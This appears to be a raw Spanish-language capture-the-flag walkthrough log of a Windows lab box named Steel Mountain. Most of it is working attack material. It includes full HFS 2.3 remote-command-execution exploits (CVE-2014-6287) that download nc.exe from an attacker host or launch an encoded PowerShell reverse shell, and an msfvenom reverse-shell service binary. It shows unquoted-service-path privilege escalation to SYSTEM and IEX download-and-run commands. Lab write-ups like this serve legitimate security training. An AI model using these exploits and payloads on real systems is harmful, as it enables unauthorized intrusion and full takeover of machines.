ModifiableFile : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AdvancedSystemCareService9'
CanRestart : True
Name : AdvancedSystemCareService9
Check : Modifiable Service Files
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFile : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'IObitUnSvr'
CanRestart : False
Name : IObitUnSvr
Check : Modifiable Service Files
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFile : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'LiveUpdateSvc'
CanRestart : False
Name : LiveUpdateSvc
Check : Modifiable Service Files
PS >
IMPORTANTE SERVICIO CON VULNERABILIDAD DE NO COTIZADO POR LOS ESPACIOS PODEMOS EXPLOTARLO Y GANATR PRIVILEGIOS DEL EJECUTORE DEL SERVICIO LOCAL SYSTEM:
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
NOS CREAMOS UN SCRIPT :EXE CON MSFVENOM EN MAQUINNA ATACANTE y ESCUCHAMOS CON NETCAT Y LO SUBIMOS ALA AMAQUINA VUICTIMA EN LA SESION DE METERPRETER PARA EJECUTAR EL SERVICIO DENTRO DE LA RUTA VULNERABLE POR NO COTIZACION:
CONSEGUIMNOS SYSTEM ESCALA DE PRIVILEGIOS ATACANTE:
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.53.67 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe-service file: 15872 bytes
Saved as: Advanced.exe
┌──(root㉿kali)-[~]
└─# ls
2856 Advanced.exe Documents Music PowerUp.ps1 QuAYnAaGoYf.exe Videos
49125.py Desktop Downloads Pictures Public Templates user.txt
┌──(root㉿kali)-[~]
└─# nc -lnvp 4443
listening on [any] 4443 ...
┌──(root㉿kali)-[~]
└─# nc -lnvp 4443
listening on [any] 4443 ...
ls
connect to [10.10.53.67] from (UNKNOWN) [10.10.220.84] 49371
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32>whoami
whoami
nt authority\system
FLAG:
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Users\Administrator\Desktop
10/12/2020 11:05 AM <DIR> .
10/12/2020 11:05 AM <DIR> ..
10/12/2020 11:05 AM 1,528 activation.ps1
09/27/2019 04:41 AM 32 root.txt
2 File(s) 1,560 bytes
2 Dir(s) 44,153,380,864 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
9af5f314f57607c00fd09803a587db80
--------
VICTIMA:
meterpreter > ls
Listing: C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
====================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2024-01-18 23:12:55 +0000 %TEMP%
100666/rw-rw-rw- 174 fil 2019-09-27 11:07:07 +0000 desktop.ini
100777/rwxrwxrwx 760320 fil 2014-02-16 20:58:52 +0000 hfs.exe
meterpreter > pwd
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
meterpreter > cd C:\Program Files (x86)\IObit
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
meterpreter > cd Program Files (x86)\IObit
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
meterpreter > cd /Program Files (x86)/IObit
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
meterpreter > cd "/Program Files (x86)/IObit"
meterpreter > ls
Listing: C:\Program Files (x86)\IObit
=====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 32768 dir 2024-01-18 21:08:53 +0000 Advanced SystemCare
040777/rwxrwxrwx 16384 dir 2019-09-27 05:35:24 +0000 IObit Uninstaller
040777/rwxrwxrwx 4096 dir 2019-09-26 15:18:50 +0000 LiveUpdate
meterpreter > upload Advanced.exe
[*] uploading : /root/Advanced.exe -> Advanced.exe
[*] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /root/Advanced.exe -> Advanced.exe
[*] uploaded : /root/Advanced.exe -> Advanced.exe
meterpreter > ls
Listing: C:\Program Files (x86)\IObit
=====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 32768 dir 2024-01-18 21:08:53 +0000 Advanced SystemCare
100777/rwxrwxrwx 15872 fil 2024-01-18 23:16:03 +0000 Advanced.exe
040777/rwxrwxrwx 16384 dir 2019-09-27 05:35:24 +0000 IObit Uninstaller
040777/rwxrwxrwx 4096 dir 2019-09-26 15:18:50 +0000 LiveUpdate
PS > Stop-Service -Name AdvancedSystemCareService9
PS > Start-Service -Name AdvancedSystemCareService9
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SIN METASPLOIT:
ESTE SCRIPT NO FUNCIONO*****************
┌──(root㉿kali)-[~]
└─# ls
2856 Advanced.exe Documents Music PowerUp.ps1 QuAYnAaGoYf.exe Videos user.txt
49125.py Desktop Downloads Pictures Public Templates exploitpaimon.py
┌──(root㉿kali)-[~]
└─# cat exploitpaimon.py
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.
#Usage : python Exploit.py <Target IP address> <Target Port Number>
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!
import urllib2
import sys
try:
def script_create():
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
def execute_script():
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
def nc_run():
urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
ip_addr = "192.168.44.128" #local IP address
local_port = "443" # Local Port number
vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
save= "save|" + vbs
vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
exe= "exec|"+vbs2
vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
exe1= "exec|"+vbs3
script_create()
execute_script()
nc_run()
except:
print """[.]Something went wrong..!
Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
Don't forgot to change the Local IP address and Port number on the script"""
////////////////////
PRUEBO OTRO SCRIPt:
ESTE SCRIPT NO FUNCIONO:*****************
http://10.10.220.84:8080/?search=%00{.+exec|whoami}
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>HFS /</title>
<link rel="stylesheet" href="/?mode=section&id=style.css" type="text/css">
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js"></script>
<script> if (typeof jQuery == "undefined") document.write('<script type="text/javascript" src="/?mode=jquery"></'+'script>'); </script>
<link rel="shortcut icon" href="/favicon.ico">
<style class='trash-me'>
.onlyscript, button[onclick] { display:none; }
</style>
<script>
// this object will store some %symbols% in the javascript space, so that libs can read them
HFS = { folder:'/', number:0, paged:1 };
</script>
<script type="text/javascript" src="/?mode=section&id=lib.js"></script>
</head>
<body>
<!-- -->
<div id='panel'>
<fieldset id='msgs'>
<legend><img src="/~img10"> Messages</legend>
<ul style='padding-left:2em'>
</ul>
</fieldset>
<fieldset id='login'>
<legend><img src="/~img27"> User</legend>
<center>
<a href="~login">Login</a>
</center>
</fieldset>
<fieldset id='folder'>
<legend><img src="/~img8"> Folder</legend>
<div style='float:right; position:relative; top:-1em; font-weight:bold;'>
<a href="."><img src="/~img14"> Back</a>
</div>
<div id='breadcrumbs'>
<a href="/" /> <img src="/~img1"> Home</a>
</div>
<div id='folder-stats'>0 folders, 0 files, 0 bytes
</div>
</fieldset>
<fieldset id='search'>
<legend><img src="/~img3"> Search</legend>
<form style='text-align:center'>
<input name='search' size='15' value="{.replace
<fieldset id='select' class='onlyscript'>
<legend><img src="/~img15"> Select</legend>
<center>
<button onclick="
var x = $('#files .selector');
if (x.size() > x.filter(':checked').size())
x.attr('checked', true).closest('tr').addClass('selected');
else
x.attr('checked', false).closest('tr').removeClass('selected');
selectedChanged();
">All</button>
<button onclick="
$('#files .selector').attr('checked', function(i,v){ return !v }).closest('tr').toggleClass('selected');
selectedChanged();
">Invert</button>
<button onclick='selectionMask.call(this)'>Mask</button>
<p style='display:none; margin-top:1em;'><span id='selected-number'>0</span> items selected</p>
</center>
</fieldset>
<fieldset id='actions'>
<legend><img src="/~img18"> Actions</legend>
<center>
<button id='archiveBtn' onclick='if (confirm("Are you sure?")) submit({}, "/?search=%00%7B.+exec%7Cwhoami%7D&mode=archive&recursive")'>Archive</button>
<a href="/?search=%00%7B.+exec%7Cwhoami%7D&tpl=list">Get list</a>
</center>
</fieldset>
<fieldset id='serverinfo'>
<legend><img src="/~img0"> Server information</legend>
<a href="http://www.rejetto.com/hfs/">HttpFileServer 2.3</a>
<br />Server time: 1/18/2024 4:50:25 PM
<br />Server uptime: 03:41:53
</fieldset>
</div>
<div id='files_outer'>
<div style='height:1.6em;'></div>
<div style='font-size:200%; padding:1em;'>No items match your search query</div>
</div>
</body>
</html>
//////////////////////
BINGO LO CONSEGUIMOS CON ESTE SCRIPT DE EXPLOIT TENEMOS LA REVERSE SHELL:
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
#!/usr/bin/python3
import base64
import os
import urllib.request
import urllib.parse
lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80
# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'
# Encode the command in base64 format
encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
print("\nEncoded the command in base64 format...")
# Define the payload to be included in the URL
payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'
# Encode the payload and send a HTTP GET request
encoded_payload = urllib.parse.quote_plus(payload)
url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
urllib.request.urlopen(url)
print("\nEncoded the payload and sent a HTTP GET request to the target...")
# Print some information
print("\nPrinting some information for debugging...")
print("lhost: ", lhost)
print("lport: ", lport)
print("rhost: ", rhost)
print("rport: ", rport)
print("payload: ", payload)
# Listen for connections
print("\nListening for connection...")
os.system(f'nc -nlvp {lport}')
LISTAMOS EL BINARIO STATICOP CON UN SERVIDOR:
┌──(root㉿kali)-[~]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.53.252 - - [19/Jan/2024 23:54:35] "GET /nc.exe HTTP/1.1" 200 -
10.10.53.252 - - [19/Jan/2024 23:54:35] "GET /nc.exe HTTP/1.1" 200 -
10.10.53.252 - - [19/Jan/2024 23:54:35] "GET /nc.exe HTTP/1.1" 200 -
10.10.53.252 - - [19/Jan/2024 23:54:35] "GET /nc.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
┌──(root㉿kali)-[~]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
EJECUTAMOS PARA LA CONECCION:
┌──(root㉿kali)-[~]
└─# python3 paimonexploit2.py
Encoded the command in base64 format...
Encoded the payload and sent a HTTP GET request to the target...
Printing some information for debugging...
lhost: 10.10.71.192
lport: 443
rhost: 10.10.53.252
rport: 8080
payload: exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4ANwAxAC4AMQA5ADIAIgAsADQANAAzACkAOwAgACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7ACAAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAgAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAwACwAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAIAAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACQAaQApADsAIAAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAgACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgARwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACAAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAgACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAgACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAgACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
Listening for connection...
listening on [any] 443 ...
connect to [10.10.71.192] from (UNKNOWN) [10.10.53.252] 49344
dir
Directory: C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 2/16/2014 12:58 PM 760320 hfs.exe
PS C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup> whoami
steelmountain\bill
PS C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>
INTENDAO EJECUTARLO:
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/winPEASps1 -OutFile Winpeas.ps1
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/winPEASps1 -OutFile winPEASps1
winPEASps1
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/winPEASexe -OutFile winPEASexe
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/winPEASexe -OutFile winPEAS.exe
icacls .\winPEAS.exe /grant:r "$($env:USERNAME):(F)"
winPEASexe
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/winPEAS.ps1 -OutFile winPEAS.ps1
winPEAS.ps1
powershell -c (new-object System.Net.WebClient).DownloadFile('http://10.10.71.192:80/winPEASps1','winPEAS.ps1')
powershell -c (New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/PowerUp.ps1 -OutFile PowerUp.ps1
PowerUp.ps1
¿Qué comando powershell -c podríamos ejecutar para averiguar manualmente el nombre del servicio?
powershell -c Get-Service
powershell -f .\winPEAS.ps1
powershell -c .\Winpeas.ps1
powershell -c .\Winpeas.ps1
powershell -c ./Winpeas.ps1
********** ** *************
powershell -c ServiceName
powershell -c "Get-Service"
powershell -c .\winPEASany
powershell -f .\winPEAS.ps1
powershell -c .\winPEAS.ps1
SERVICIO:
AdvancedSystemCareService9
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/Advanced.exe -OutFile Advanced.exe
Advanced.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.71.192 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
──(root㉿kali)-[~]
└─# nc -lnvp 4443
listening on [any] 4443 ...
connect to [10.10.71.192] from (UNKNOWN) [10.10.53.252] 49436
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd ..
cd ..Last updated